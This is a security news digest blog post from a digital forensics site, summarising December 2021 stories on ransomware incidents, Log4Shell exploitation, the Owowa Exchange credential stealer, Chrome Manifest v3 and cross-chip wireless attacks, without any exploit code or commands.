AboutDFIR.com – The Definitive Compendium Project
Digital Forensics & Incident Response

Blog Post

InfoSec News Nuggets 12/15/2021

Billion-dollar natural gas supplier Superior Plus hit with ransomware

Major natural gas supplier Superior Plus announced on Tuesday that it is suffering from a ransomware attack. The billion-dollar propane seller said the incident started on December 12 but did not answer questions about which ransomware group was behind the attack or which systems were affected. “Superior has temporarily disabled certain computer systems and applications as it investigates this incident and is in the process of bringing these systems back online,” the company said, adding that it “took steps to secure its systems and mitigate the impact to the Corporation’s data and operations.” The company said it is still figuring out the scope of the impact on its operations and asked customers for “patience” as it responds to the attack. According to the company’s statement, a cybersecurity company was hired to help deal with the attack.

 

Cybersecurity incident prevents Maryland Health Department from publishing Covid-19 case data

The Maryland Health Department has not published data on coronavirus case rates for nine days as it recovers from a “network security incident,” the department said Tuesday. The department is focused on “gaining full visibility into the affected network infrastructure” and working to bring affected IT systems back online following the hack, department spokesperson Andy Owen told CNN in an email. In the meantime, data on vaccinations and hospitalizations, among other information related to the virus, is still being published, Owen said. “Our remaining data reports will be updated at the earliest opportunity.” Owen declined to answer questions about the cause of the hacking incident or when the department expects to be fully back online.

 

New ransomware now being deployed in Log4Shell attacks

The first public case of the Log4j Log4Shell vulnerability used to download and install ransomware has been discovered by researchers. Last Friday, a public exploit was released for a critical zero-day vulnerability named ‘Log4Shell’ in the Apache Log4j Java-based logging platform. Log4j is a development framework that allows developers to add error and event logging into their Java applications. The vulnerability allows threat actors to create special JNDI strings that, when read by Log4j, cause the platform to connect to and execute code at the included URL. This allows attackers to easily detect vulnerable devices or execute code supplied by a remote site or via Base64 encoded strings.

 

Hackers steal Microsoft Exchange credentials using IIS module

Threat actors are installing a malicious IIS web server module named ‘Owowa’ on Microsoft Exchange Outlook Web Access servers to steal credentials and execute commands on the server remotely. The development of Owowa likely started in late 2020 based on compilation data and when it was uploaded to the VirtusTotal malware scanning service. Based on Kaspersky’s telemetry data, the most recent sample in circulation is from April 2021, targeting servers in Malaysia, Mongolia, Indonesia, and the Philippines. These systems belong to government organizations, public transportation companies, and other crucial entities. Kaspersky underlines that the ‘Owowa’ targets aren’t limited to Southeast Asia, and they have also seen signs of infections in Europe.

 

The EFF will fight Google Chrome Manifest v3 which kills extensions that reliably block ads

Google Chrome will gradually undergo a fundamental revision, and it will deeply impact all extensions for the web browser. The upcoming revised set of Application Programming Interfaces (APIs), collectively known as Manifest v3, will essentially kill all popular ad-blocking extensions. The Electronic Frontier Foundation or EFF has vowed to fight this change, but it could be a losing battle. The EFF has promised to take on Google, and attempt to convince the tech giant to rethink the Chrome Manifest v3. Essentially, the consortium is trying to repeal the detrimental set of APIs which primarily seek to decimate some specific and popular extensions for the Chrome web browser. EFF technologists Alexei Miagkov and Bennett Cyphers have reportedly called out Google for deliberately hampering ad blocking extensions under the guise of development. “According to Google, Manifest v3 will improve privacy, security, and performance. We fundamentally disagree. The changes in Manifest v3 won’t stop malicious extensions, but will hurt innovation, reduce extension capabilities, and harm real-world performance,” stated Miagkov.

 

Bugs in billions of WiFi, Bluetooth chips allow password, data theft

Researchers at the University of Darmstadt, Brescia, CNIT, and the Secure Mobile Networking Lab, have published a paper that proves it’s possible to extract passwords and manipulate traffic on a WiFi chip by targeting a device’s Bluetooth component. Modern consumer electronic devices such as smartphones feature SoCs with separate Bluetooth, WiFi, and LTE components, each with its own dedicated security implementation. However, these components often share the same resources, such as the antenna or wireless spectrum. This resource sharing aims to make the SoCs more energy-efficient and give them higher throughput and low latency in communications. As the researchers detail in the recently published paper, it is possible to use these shared resources as bridges for launching lateral privilege escalation attacks across wireless chip boundaries.

Related Posts